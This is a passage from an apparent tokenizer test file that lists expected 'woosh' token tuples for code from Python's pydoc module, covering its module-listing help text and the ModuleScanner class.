woosh.Token(woosh.OP, ')', 2184, 14, 2184, 15),
woosh.Token(woosh.OP, ')', 2184, 15, 2184, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2184, 16, 2185, 0),
woosh.Token(woosh.NAME, 'apropos', 2185, 12, 2185, 19),
woosh.Token(woosh.OP, '(', 2185, 19, 2185, 20),
woosh.Token(woosh.NAME, 'key', 2185, 20, 2185, 23),
woosh.Token(woosh.OP, ')', 2185, 23, 2185, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2185, 24, 2186, 0),
woosh.Token(woosh.DEDENT, ' ', 2186, 0, 2186, 8),
woosh.Token(woosh.NAME, 'else', 2186, 8, 2186, 12),
woosh.Token(woosh.OP, ':', 2186, 12, 2186, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2186, 13, 2187, 0),
woosh.Token(woosh.INDENT, ' ', 2187, 0, 2187, 12),
woosh.Token(woosh.NAME, 'self', 2187, 12, 2187, 16),
woosh.Token(woosh.OP, '.', 2187, 16, 2187, 17),
woosh.Token(woosh.NAME, 'output', 2187, 17, 2187, 23),
woosh.Token(woosh.OP, '.', 2187, 23, 2187, 24),
woosh.Token(woosh.NAME, 'write', 2187, 24, 2187, 29),
woosh.Token(woosh.OP, '(', 2187, 29, 2187, 30),
woosh.Token(woosh.STRING, "'''\r\nPlease wait a moment while I gather a list of all available modules...\r\n\r\n'''", 2187, 30, 2190, 3),
woosh.Token(woosh.OP, ')', 2190, 3, 2190, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2190, 4, 2191, 0),
woosh.Token(woosh.NAME, 'modules', 2191, 12, 2191, 19),
woosh.Token(woosh.OP, '=', 2191, 20, 2191, 21),
woosh.Token(woosh.OP, '{', 2191, 22, 2191, 23),
woosh.Token(woosh.OP, '}', 2191, 23, 2191, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2191, 24, 2192, 0),
woosh.Token(woosh.NAME, 'def', 2192, 12, 2192, 15),
woosh.Token(woosh.NAME, 'callback', 2192, 16, 2192, 24),
woosh.Token(woosh.OP, '(', 2192, 24, 2192, 25),
woosh.Token(woosh.NAME, 'path', 2192, 25, 2192, 29),
woosh.Token(woosh.OP, ',', 2192, 29, 2192, 30),
woosh.Token(woosh.NAME, 'modname', 2192, 31, 2192, 38),
woosh.Token(woosh.OP, ',', 2192, 38, 2192, 39),
woosh.Token(woosh.NAME, 'desc', 2192, 40, 2192, 44),
woosh.Token(woosh.OP, ',', 2192, 44, 2192, 45),
woosh.Token(woosh.NAME, 'modules', 2192, 46, 2192, 53),
woosh.Token(woosh.OP, '=', 2192, 53, 2192, 54),
woosh.Token(woosh.NAME, 'modules', 2192, 54, 2192, 61),
woosh.Token(woosh.OP, ')', 2192, 61, 2192, 62),
woosh.Token(woosh.OP, ':', 2192, 62, 2192, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2192, 63, 2193, 0),
woosh.Token(woosh.INDENT, ' ', 2193, 0, 2193, 16),
woosh.Token(woosh.NAME, 'if', 2193, 16, 2193, 18),
woosh.Token(woosh.NAME, 'modname', 2193, 19, 2193, 26),
woosh.Token(woosh.NAME, 'and', 2193, 27, 2193, 30),
woosh.Token(woosh.NAME, 'modname', 2193, 31, 2193, 38),
woosh.Token(woosh.OP, '[', 2193, 38, 2193, 39),
woosh.Token(woosh.OP, '-', 2193, 39, 2193, 40),
woosh.Token(woosh.NUMBER, '9', 2193, 40, 2193, 41),
woosh.Token(woosh.OP, ':', 2193, 41, 2193, 42),
woosh.Token(woosh.OP, ']', 2193, 42, 2193, 43),
woosh.Token(woosh.OP, '==', 2193, 44, 2193, 46),
woosh.Token(woosh.STRING, "'.__init__'", 2193, 47, 2193, 58),
woosh.Token(woosh.OP, ':', 2193, 58, 2193, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2193, 59, 2194, 0),
woosh.Token(woosh.INDENT, ' ', 2194, 0, 2194, 20),
woosh.Token(woosh.NAME, 'modname', 2194, 20, 2194, 27),
woosh.Token(woosh.OP, '=', 2194, 28, 2194, 29),
woosh.Token(woosh.NAME, 'modname', 2194, 30, 2194, 37),
woosh.Token(woosh.OP, '[', 2194, 37, 2194, 38),
woosh.Token(woosh.OP, ':', 2194, 38, 2194, 39),
woosh.Token(woosh.OP, '-', 2194, 39, 2194, 40),
woosh.Token(woosh.NUMBER, '9', 2194, 40, 2194, 41),
woosh.Token(woosh.OP, ']', 2194, 41, 2194, 42),
woosh.Token(woosh.OP, '+', 2194, 43, 2194, 44),
woosh.Token(woosh.STRING, "' (package)'", 2194, 45, 2194, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2194, 57, 2195, 0),
woosh.Token(woosh.DEDENT, ' ', 2195, 0, 2195, 16),
woosh.Token(woosh.NAME, 'if', 2195, 16, 2195, 18),
woosh.Token(woosh.NAME, 'modname', 2195, 19, 2195, 26),
woosh.Token(woosh.OP, '.', 2195, 26, 2195, 27),
woosh.Token(woosh.NAME, 'find', 2195, 27, 2195, 31),
woosh.Token(woosh.OP, '(', 2195, 31, 2195, 32),
woosh.Token(woosh.STRING, "'.'", 2195, 32, 2195, 35),
woosh.Token(woosh.OP, ')', 2195, 35, 2195, 36),
woosh.Token(woosh.OP, '<', 2195, 37, 2195, 38),
woosh.Token(woosh.NUMBER, '0', 2195, 39, 2195, 40),
woosh.Token(woosh.OP, ':', 2195, 40, 2195, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2195, 41, 2196, 0),
woosh.Token(woosh.INDENT, ' ', 2196, 0, 2196, 20),
woosh.Token(woosh.NAME, 'modules', 2196, 20, 2196, 27),
woosh.Token(woosh.OP, '[', 2196, 27, 2196, 28),
woosh.Token(woosh.NAME, 'modname', 2196, 28, 2196, 35),
woosh.Token(woosh.OP, ']', 2196, 35, 2196, 36),
woosh.Token(woosh.OP, '=', 2196, 37, 2196, 38),
woosh.Token(woosh.NUMBER, '1', 2196, 39, 2196, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2196, 40, 2197, 0),
woosh.Token(woosh.DEDENT, ' ', 2197, 0, 2197, 12),
woosh.Token(woosh.DEDENT, '', 2197, 12, 2197, 12),
woosh.Token(woosh.NAME, 'def', 2197, 12, 2197, 15),
woosh.Token(woosh.NAME, 'onerror', 2197, 16, 2197, 23),
woosh.Token(woosh.OP, '(', 2197, 23, 2197, 24),
woosh.Token(woosh.NAME, 'modname', 2197, 24, 2197, 31),
woosh.Token(woosh.OP, ')', 2197, 31, 2197, 32),
woosh.Token(woosh.OP, ':', 2197, 32, 2197, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2197, 33, 2198, 0),
woosh.Token(woosh.INDENT, ' ', 2198, 0, 2198, 16),
woosh.Token(woosh.NAME, 'callback', 2198, 16, 2198, 24),
woosh.Token(woosh.OP, '(', 2198, 24, 2198, 25),
woosh.Token(woosh.NAME, 'None', 2198, 25, 2198, 29),
woosh.Token(woosh.OP, ',', 2198, 29, 2198, 30),
woosh.Token(woosh.NAME, 'modname', 2198, 31, 2198, 38),
woosh.Token(woosh.OP, ',', 2198, 38, 2198, 39),
woosh.Token(woosh.NAME, 'None', 2198, 40, 2198, 44),
woosh.Token(woosh.OP, ')', 2198, 44, 2198, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2198, 45, 2199, 0),
woosh.Token(woosh.DEDENT, ' ', 2199, 0, 2199, 12),
woosh.Token(woosh.NAME, 'ModuleScanner', 2199, 12, 2199, 25),
woosh.Token(woosh.OP, '(', 2199, 25, 2199, 26),
woosh.Token(woosh.OP, ')', 2199, 26, 2199, 27),
woosh.Token(woosh.OP, '.', 2199, 27, 2199, 28),
woosh.Token(woosh.NAME, 'run', 2199, 28, 2199, 31),
woosh.Token(woosh.OP, '(', 2199, 31, 2199, 32),
woosh.Token(woosh.NAME, 'callback', 2199, 32, 2199, 40),
woosh.Token(woosh.OP, ',', 2199, 40, 2199, 41),
woosh.Token(woosh.NAME, 'onerror', 2199, 42, 2199, 49),
woosh.Token(woosh.OP, '=', 2199, 49, 2199, 50),
woosh.Token(woosh.NAME, 'onerror', 2199, 50, 2199, 57),
woosh.Token(woosh.OP, ')', 2199, 57, 2199, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2199, 58, 2200, 0),
woosh.Token(woosh.NAME, 'self', 2200, 12, 2200, 16),
woosh.Token(woosh.OP, '.', 2200, 16, 2200, 17),
woosh.Token(woosh.NAME, 'list', 2200, 17, 2200, 21),
woosh.Token(woosh.OP, '(', 2200, 21, 2200, 22),
woosh.Token(woosh.NAME, 'modules', 2200, 22, 2200, 29),
woosh.Token(woosh.OP, '.', 2200, 29, 2200, 30),
woosh.Token(woosh.NAME, 'keys', 2200, 30, 2200, 34),
woosh.Token(woosh.OP, '(', 2200, 34, 2200, 35),
woosh.Token(woosh.OP, ')', 2200, 35, 2200, 36),
woosh.Token(woosh.OP, ')', 2200, 36, 2200, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2200, 37, 2201, 0),
woosh.Token(woosh.NAME, 'self', 2201, 12, 2201, 16),
woosh.Token(woosh.OP, '.', 2201, 16, 2201, 17),
woosh.Token(woosh.NAME, 'output', 2201, 17, 2201, 23),
woosh.Token(woosh.OP, '.', 2201, 23, 2201, 24),
woosh.Token(woosh.NAME, 'write', 2201, 24, 2201, 29),
woosh.Token(woosh.OP, '(', 2201, 29, 2201, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nEnter any module name to get more help. Or, type "modules spam" to search\r\nfor modules whose name or summary contain the string "spam".\r\n\'\'\'', 2201, 30, 2204, 3),
woosh.Token(woosh.OP, ')', 2204, 3, 2204, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2204, 4, 2205, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.DEDENT, '', 2206, 0, 2206, 0),
woosh.Token(woosh.NAME, 'help', 2206, 0, 2206, 4),
woosh.Token(woosh.OP, '=', 2206, 5, 2206, 6),
woosh.Token(woosh.NAME, 'Helper', 2206, 7, 2206, 13),
woosh.Token(woosh.OP, '(', 2206, 13, 2206, 14),
woosh.Token(woosh.OP, ')', 2206, 14, 2206, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2206, 15, 2207, 0),
woosh.Token(woosh.NAME, 'class', 2208, 0, 2208, 5),
woosh.Token(woosh.NAME, 'ModuleScanner', 2208, 6, 2208, 19),
woosh.Token(woosh.OP, ':', 2208, 19, 2208, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2208, 20, 2209, 0),
woosh.Token(woosh.INDENT, ' ', 2209, 0, 2209, 4),
woosh.Token(woosh.STRING, '"""An interruptible scanner that searches module synopses."""', 2209, 4, 2209, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2209, 65, 2210, 0),
woosh.Token(woosh.NAME, 'def', 2211, 4, 2211, 7),
woosh.Token(woosh.NAME, 'run', 2211, 8, 2211, 11),
woosh.Token(woosh.OP, '(', 2211, 11, 2211, 12),
woosh.Token(woosh.NAME, 'self', 2211, 12, 2211, 16),
woosh.Token(woosh.OP, ',', 2211, 16, 2211, 17),
woosh.Token(woosh.NAME, 'callback', 2211, 18, 2211, 26),
woosh.Token(woosh.OP, ',', 2211, 26, 2211, 27),
woosh.Token(woosh.NAME, 'key', 2211, 28, 2211, 31),
woosh.Token(woosh.OP, '=', 2211, 31, 2211, 32),
woosh.Token(woosh.NAME, 'None', 2211, 32, 2211, 36),
woosh.Token(woosh.OP, ',', 2211, 36, 2211, 37),
woosh.Token(woosh.NAME, 'completer', 2211, 38, 2211, 47),
woosh.Token(woosh.OP, '=', 2211, 47, 2211, 48),
woosh.Token(woosh.NAME, 'None', 2211, 48, 2211, 52),
woosh.Token(woosh.OP, ',', 2211, 52, 2211, 53),
woosh.Token(woosh.NAME, 'onerror', 2211, 54, 2211, 61),
woosh.Token(woosh.OP, '=', 2211, 61, 2211, 62),
woosh.Token(woosh.NAME, 'None', 2211, 62, 2211, 66),
woosh.Token(woosh.OP, ')', 2211, 66, 2211, 67),
woosh.Token(woosh.OP, ':', 2211, 67, 2211, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 2211, 68, 2212, 0),
woosh.Token(woosh.INDENT, ' ', 2212, 0, 2212, 8),
woosh.Token(woosh.NAME, 'if', 2212, 8, 2212, 10),
woosh.Token(woosh.NAME, 'key', 2212, 11, 2212, 14),
woosh.Token(woosh.OP, ':', 2212, 14, 2212, 15),
woosh.Token(woosh.NAME, 'key', 2212, 16, 2212, 19),
woosh.Token(woosh.OP, '=', 2212, 20, 2212, 21),
woosh.Token(woosh.NAME, 'key', 2212, 22, 2212, 25),
woosh.Token(woosh.OP, '.', 2212, 25, 2212, 26),
woosh.Token(woosh.NAME, 'lower', 2212, 26, 2212, 31),
woosh.Token(woosh.OP, '(', 2212, 31, 2212, 32),
woosh.Token(woosh.OP, ')', 2212, 32, 2212, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2212, 33, 2213, 0),
woosh.Token(woosh.NAME, 'self', 2213, 8, 2213, 12),
woosh.Token(woosh.OP, '.', 2213, 12, 2213, 13),
woosh.Token(woosh.NAME, 'quit', 2213, 13, 2213, 17),
woosh.Token(woosh.OP, '=', 2213, 18, 2213, 19),
woosh.Token(woosh.NAME, 'False', 2213, 20, 2213, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2213, 25, 2214, 0),
woosh.Token(woosh.NAME, 'seen', 2214, 8, 2214, 12),
woosh.Token(woosh.OP, '=', 2214, 13, 2214, 14),
woosh.Token(woosh.OP, '{', 2214, 15, 2214, 16),
woosh.Token(woosh.OP, '}', 2214, 16, 2214, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2214, 17, 2215, 0),
woosh.Token(woosh.NAME, 'for', 2216, 8, 2216, 11),
woosh.Token(woosh.NAME, 'modname', 2216, 12, 2216, 19),
woosh.Token(woosh.NAME, 'in', 2216, 20, 2216, 22),
woosh.Token(woosh.NAME, 'sys', 2216, 23, 2216, 26),
woosh.Token(woosh.OP, '.', 2216, 26, 2216, 27),
woosh.Token(woosh.NAME, 'builtin_module_names', 2216, 27, 2216, 47),
woosh.Token(woosh.OP, ':', 2216, 47, 2216, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2216, 48, 2217, 0),
woosh.Token(woosh.INDENT, ' ', 2217, 0, 2217, 12),
woosh.Token(woosh.NAME, 'if', 2217, 12, 2217, 14),
woosh.Token(woosh.NAME, 'modname', 2217, 15, 2217, 22),
woosh.Token(woosh.OP, '!=', 2217, 23, 2217, 25),
woosh.Token(woosh.STRING, "'__main__'", 2217, 26, 2217, 36),
woosh.Token(woosh.OP, ':', 2217, 36, 2217, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2217, 37, 2218, 0),
woosh.Token(woosh.INDENT, ' ', 2218, 0, 2218, 16),
woosh.Token(woosh.NAME, 'seen', 2218, 16, 2218, 20),
woosh.Token(woosh.OP, '[', 2218, 20, 2218, 21),
woosh.Token(woosh.NAME, 'modname', 2218, 21, 2218, 28),
woosh.Token(woosh.OP, ']', 2218, 28, 2218, 29),
woosh.Token(woosh.OP, '=', 2218, 30, 2218, 31),
woosh.Token(woosh.NUMBER, '1', 2218, 32, 2218, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2218, 33, 2219, 0),
woosh.Token(woosh.NAME, 'if', 2219, 16, 2219, 18),
woosh.Token(woosh.NAME, 'key', 2219, 19, 2219, 22),
woosh.Token(woosh.NAME, 'is', 2219, 23, 2219, 25),
woosh.Token(woosh.NAME, 'None', 2219, 26, 2219, 30),
woosh.Token(woosh.OP, ':', 2219, 30, 2219, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2219, 31, 2220, 0),
woosh.Token(woosh.INDENT, ' ', 2220, 0, 2220, 20),
woosh.Token(woosh.NAME, 'callback', 2220, 20, 2220, 28),
woosh.Token(woosh.OP, '(', 2220, 28, 2220, 29),
woosh.Token(woosh.NAME, 'None', 2220, 29, 2220, 33),
woosh.Token(woosh.OP, ',', 2220, 33, 2220, 34),
woosh.Token(woosh.NAME, 'modname', 2220, 35, 2220, 42),
woosh.Token(woosh.OP, ',', 2220, 42, 2220, 43),
woosh.Token(woosh.STRING, "''", 2220, 44, 2220, 46),
woosh.Token(woosh.OP, ')', 2220, 46, 2220, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2220, 47, 2221, 0),
woosh.Token(woosh.DEDENT, ' ', 2221, 0, 2221, 16),
woosh.Token(woosh.NAME, 'else', 2221, 16, 2221, 20),
woosh.Token(woosh.OP, ':', 2221, 20, 2221, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2221, 21, 2222, 0),
woosh.Token(woosh.INDENT, ' ', 2222, 0, 2222, 20),
woosh.Token(woosh.NAME, 'name', 2222, 20, 2222, 24),
woosh.Token(woosh.OP, '=', 2222, 25, 2222, 26),
woosh.Token(woosh.NAME, '__import__', 2222, 27, 2222, 37),
woosh.Token(woosh.OP, '(', 2222, 37, 2222, 38),
woosh.Token(woosh.NAME, 'modname', 2222, 38, 2222, 45),
woosh.Token(woosh.OP, ')', 2222, 45, 2222, 46),
woosh.Token(woosh.OP, '.', 2222, 46, 2222, 47),
woosh.Token(woosh.NAME, '__doc__', 2222, 47, 2222, 54),
woosh.Token(woosh.NAME, 'or', 2222, 55, 2222, 57),
woosh.Token(woosh.STRING, "''", 2222, 58, 2222, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2222, 60, 2223, 0),
woosh.Token(woosh.NAME, 'desc', 2223, 20, 2223, 24),
woosh.Token(woosh.OP, '=', 2223, 25, 2223, 26),
woosh.Token(woosh.NAME, 'name', 2223, 27, 2223, 31),
woosh.Token(woosh.OP, '.', 2223, 31, 2223, 32),
woosh.Token(woosh.NAME, 'split', 2223, 32, 2223, 37),
woosh.Token(woosh.OP, '(', 2223, 37, 2223, 38),
woosh.Token(woosh.STRING, "'\\n'", 2223, 38, 2223, 42),
woosh.Token(woosh.OP, ')', 2223, 42, 2223, 43),
woosh.Token(woosh.OP, '[', 2223, 43, 2223, 44),
woosh.Token(woosh.NUMBER, '0', 2223, 44, 2223, 45),
woosh.Token(woosh.OP, ']', 2223, 45, 2223, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2223, 46, 2224, 0),
woosh.Token(woosh.NAME, 'name', 2224, 20, 2224, 24),
woosh.Token(woosh.OP, '=', 2224, 25, 2224, 26),
woosh.Token(woosh.NAME, 'modname', 2224, 27, 2224, 34),
woosh.Token(woosh.OP, '+', 2224, 35, 2224, 36),
woosh.Token(woosh.STRING, "' - '", 2224, 37, 2224, 42),
woosh.Token(woosh.OP, '+', 2224, 43, 2224, 44),
woosh.Token(woosh.NAME, 'desc', 2224, 45, 2224, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2224, 49, 2225, 0),
woosh.Token(woosh.NAME, 'if', 2225, 20, 2225, 22),
woosh.Token(woosh.NAME, 'name', 2225, 23, 2225, 27),
woosh.Token(woosh.OP, '.', 2225, 27, 2225, 28),
woosh.Token(woosh.NAME, 'lower', 2225, 28, 2225, 33),
woosh.Token(woosh.OP, '(', 2225, 33, 2225, 34),
woosh.Token(woosh.OP, ')', 2225, 34, 2225, 35),
woosh.Token(woosh.OP, '.', 2225, 35, 2225, 36),
woosh.Token(woosh.NAME, 'find', 2225, 36, 2225, 40),
woosh.Token(woosh.OP, '(', 2225, 40, 2225, 41),
woosh.Token(woosh.NAME, 'key', 2225, 41, 2225, 44),
woosh.Token(woosh.OP, ')', 2225, 44, 2225, 45),
woosh.Token(woosh.OP, '>=', 2225, 46, 2225, 48),
woosh.Token(woosh.NUMBER, '0', 2225, 49, 2225, 50),
woosh.Token(woosh.OP, ':', 2225, 50, 2225, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2225, 51, 2226, 0),
woosh.Token(woosh.INDENT, ' ', 2226, 0, 2226, 24),
woosh.Token(woosh.NAME, 'callback', 2226, 24, 2226, 32),
woosh.Token(woosh.OP, '(', 2226, 32, 2226, 33),
woosh.Token(woosh.NAME, 'None', 2226, 33, 2226, 37),
woosh.Token(woosh.OP, ',', 2226, 37, 2226, 38),
woosh.Token(woosh.NAME, 'modname', 2226, 39, 2226, 46),
woosh.Token(woosh.OP, ',', 2226, 46, 2226, 47),
woosh.Token(woosh.NAME, 'desc', 2226, 48, 2226, 52),
woosh.Token(woosh.OP, ')', 2226, 52, 2226, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2226, 53, 2227, 0),
woosh.Token(woosh.DEDENT, ' ', 2228, 0, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.NAME, 'for', 2228, 8, 2228, 11),
woosh.Token(woosh.NAME, 'importer', 2228, 12, 2228, 20),
woosh.Token(woosh.OP, ',', 2228, 20, 2228, 21),
woosh.Token(woosh.NAME, 'modname', 2228, 22, 2228, 29),
woosh.Token(woosh.OP, ',', 2228, 29, 2228, 30),
woosh.Token(woosh.NAME, 'ispkg', 2228, 31, 2228, 36),
woosh.Token(woosh.NAME, 'in', 2228, 37, 2228, 39),
woosh.Token(woosh.NAME, 'pkgutil', 2228, 40, 2228, 47),
woosh.Token(woosh.OP, '.', 2228, 47, 2228, 48),
woosh.Token(woosh.NAME, 'walk_packages', 2228, 48, 2228, 61),
woosh.Token(woosh.OP, '(', 2228, 61, 2228, 62),
woosh.Token(woosh.NAME, 'onerror', 2228, 62, 2228, 69),
woosh.Token(woosh.OP, '=', 2228, 69, 2228, 70),
woosh.Token(woosh.NAME, 'onerror', 2228, 70, 2228, 77),
woosh.Token(woosh.OP, ')', 2228, 77, 2228, 78),
woosh.Token(woosh.OP, ':', 2228, 78, 2228, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 2228, 79, 2229, 0),
woosh.Token(woosh.INDENT, ' ', 2229, 0, 2229, 12),
woosh.Token(woosh.NAME, 'if', 2229, 12, 2229, 14),
woosh.Token(woosh.NAME, 'self', 2229, 15, 2229, 19),
woosh.Token(woosh.OP, '.', 2229, 19, 2229, 20),
woosh.Token(woosh.NAME, 'quit', 2229, 20, 2229, 24),
woosh.Token(woosh.OP, ':', 2229, 24, 2229, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2229, 25, 2230, 0),
woosh.Token(woosh.INDENT, ' ', 2230, 0, 2230, 16),
woosh.Token(woosh.NAME, 'break', 2230, 16, 2230, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2230, 21, 2231, 0),
woosh.Token(woosh.DEDENT, ' ', 2232, 0, 2232, 12),
woosh.Token(woosh.NAME, 'if', 2232, 12, 2232, 14),
woosh.Token(woosh.NAME, 'key', 2232, 15, 2232, 18),
woosh.Token(woosh.NAME, 'is', 2232, 19, 2232, 21),
woosh.Token(woosh.NAME, 'None', 2232, 22, 2232, 26),
woosh.Token(woosh.OP, ':', 2232, 26, 2232, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2232, 27, 2233, 0),
woosh.Token(woosh.INDENT, ' ', 2233, 0, 2233, 16),
woosh.Token(woosh.NAME, 'callback', 2233, 16, 2233, 24),
woosh.Token(woosh.OP, '(', 2233, 24, 2233, 25),
woosh.Token(woosh.NAME, 'None', 2233, 25, 2233, 29),
woosh.Token(woosh.OP, ',', 2233, 29, 2233, 30),
woosh.Token(woosh.NAME, 'modname', 2233, 31, 2233, 38),
woosh.Token(woosh.OP, ',', 2233, 38, 2233, 39),
woosh.Token(woosh.STRING, "''", 2233, 40, 2233, 42),
woosh.Token(woosh.OP, ')', 2233, 42, 2233, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2233, 43, 2234, 0),
woosh.Token(woosh.DEDENT, ' ', 2234, 0, 2234, 12),
woosh.Token(woosh.NAME, 'else', 2234, 12, 2234, 16),
woosh.Token(woosh.OP, ':', 2234, 16, 2234, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2234, 17, 2235, 0),
woosh.Token(woosh.INDENT, ' ', 2235, 0, 2235, 16),
woosh.Token(woosh.NAME, 'try', 2235, 16, 2235, 19),
woosh.Token(woosh.OP, ':', 2235, 19, 2235, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2235, 20, 2236, 0),
woosh.Token(woosh.INDENT, ' ', 2236, 0, 2236, 20),
woosh.Token(woosh.NAME, 'spec', 2236, 20, 2236, 24),
woosh.Token(woosh.OP, '=', 2236, 25, 2236, 26),
woosh.Token(woosh.NAME, 'pkgutil', 2236, 27, 2236, 34),
woosh.Token(woosh.OP, '.', 2236, 34, 2236, 35),
woosh.Token(woosh.NAME, '_get_spec', 2236, 35, 2236, 44),
woosh.Token(woosh.OP, '(', 2236, 44, 2236, 45),
woosh.Token(woosh.NAME, 'importer', 2236, 45, 2236, 53),
woosh.Token(woosh.OP, ',', 2236, 53, 2236, 54),
woosh.Token(woosh.NAME, 'modname', 2236, 55, 2236, 62),
woosh.Token(woosh.OP, ')', 2236, 62, 2236, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2236, 63, 2237, 0),
woosh.Token(woosh.DEDENT, ' ', 2237, 0, 2237, 16),
woosh.Token(woosh.NAME, 'except', 2237, 16, 2237, 22),
woosh.Token(woosh.NAME, 'SyntaxError', 2237, 23, 2237, 34),
woosh.Token(woosh.OP, ':', 2237, 34, 2237, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2237, 35, 2238, 0),
woosh.Token(woosh.COMMENT, '# raised by tests for bad coding cookies or BOM', 2238, 20, 2238, 67),
woosh.Token(woosh.INDENT, ' ', 2239, 0, 2239, 20),
woosh.Token(woosh.NAME, 'continue', 2239, 20, 2239, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2239, 28, 2240, 0),
woosh.Token(woosh.DEDENT, ' ', 2240, 0, 2240, 16),
woosh.Token(woosh.NAME, 'loader', 2240, 16, 2240, 22),
woosh.Token(woosh.OP, '=', 2240, 23, 2240, 24),
woosh.Token(woosh.NAME, 'spec', 2240, 25, 2240, 29),
woosh.Token(woosh.OP, '.', 2240, 29, 2240, 30),
woosh.Token(woosh.NAME, 'loader', 2240, 30, 2240, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2240, 36, 2241, 0),
woosh.Token(woosh.NAME, 'if', 2241, 16, 2241, 18),
woosh.Token(woosh.NAME, 'hasattr', 2241, 19, 2241, 26),
woosh.Token(woosh.OP, '(', 2241, 26, 2241, 27),
woosh.Token(woosh.NAME, 'loader', 2241, 27, 2241, 33),
woosh.Token(woosh.OP, ',', 2241, 33, 2241, 34),
woosh.Token(woosh.STRING, "'get_source'", 2241, 35, 2241, 47),
woosh.Token(woosh.OP, ')', 2241, 47, 2241, 48),
woosh.Token(woosh.OP, ':', 2241, 48, 2241, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2241, 49, 2242, 0),
woosh.Token(woosh.INDENT, ' ', 2242, 0, 2242, 20),
woosh.Token(woosh.NAME, 'try', 2242, 20, 2242, 23),
woosh.Token(woosh.OP, ':', 2242, 23, 2242, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2242, 24, 2243, 0),
woosh.Token(woosh.INDENT, ' ', 2243, 0, 2243, 24),
woosh.Token(woosh.NAME, 'source', 2243, 24, 2243, 30),
woosh.Token(woosh.OP, '=', 2243, 31, 2243, 32),
woosh.Token(woosh.NAME, 'loader', 2243, 33, 2243, 39),
woosh.Token(woosh.OP, '.', 2243, 39, 2243, 40),
woosh.Token(woosh.NAME, 'get_source', 2243, 40, 2243, 50),
woosh.Token(woosh.OP, '(', 2243, 50, 2243, 51),
woosh.Token(woosh.NAME, 'modname', 2243, 51, 2243, 58),
woosh.Token(woosh.OP, ')', 2243, 58, 2243, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2243, 59, 2244, 0),
woosh.Token(woosh.DEDENT, ' ', 2244, 0, 2244, 20),
woosh.Token(woosh.NAME, 'except', 2244, 20, 2244, 26),
woosh.Token(woosh.NAME, 'Exception', 2244, 27, 2244, 36),
woosh.Token(woosh.OP, ':', 2244, 36, 2244, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2244, 37, 2245, 0),
woosh.Token(woosh.INDENT, ' ', 2245, 0, 2245, 24),
woosh.Token(woosh.NAME, 'if', 2245, 24, 2245, 26),
woosh.Token(woosh.NAME, 'onerror', 2245, 27, 2245, 34),
woosh.Token(woosh.OP, ':', 2245, 34, 2245, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2245, 35, 2246, 0),
woosh.Token(woosh.INDENT, ' ', 2246, 0, 2246, 28),
woosh.Token(woosh.NAME, 'onerror', 2246, 28, 2246, 35),
woosh.Token(woosh.OP, '(', 2246, 35, 2246, 36),
woosh.Token(woosh.NAME, 'modname', 2246, 36, 2246, 43),
woosh.Token(woosh.OP, ')', 2246, 43, 2246, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2246, 44, 2247, 0),
woosh.Token(woosh.DEDENT, ' ', 2247, 0, 2247, 24),
woosh.Token(woosh.NAME, 'continue', 2247, 24, 2247, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2247, 32, 2248, 0),
woosh.Token(woosh.DEDENT, ' ', 2248, 0, 2248, 20),
woosh.Token(woosh.NAME, 'desc', 2248, 20, 2248, 24),
woosh.Token(woosh.OP, '=', 2248, 25, 2248, 26),
woosh.Token(woosh.NAME, 'source_synopsis', 2248, 27, 2248, 42),
woosh.Token(woosh.OP, '(', 2248, 42, 2248, 43),
woosh.Token(woosh.NAME, 'io', 2248, 43, 2248, 45),
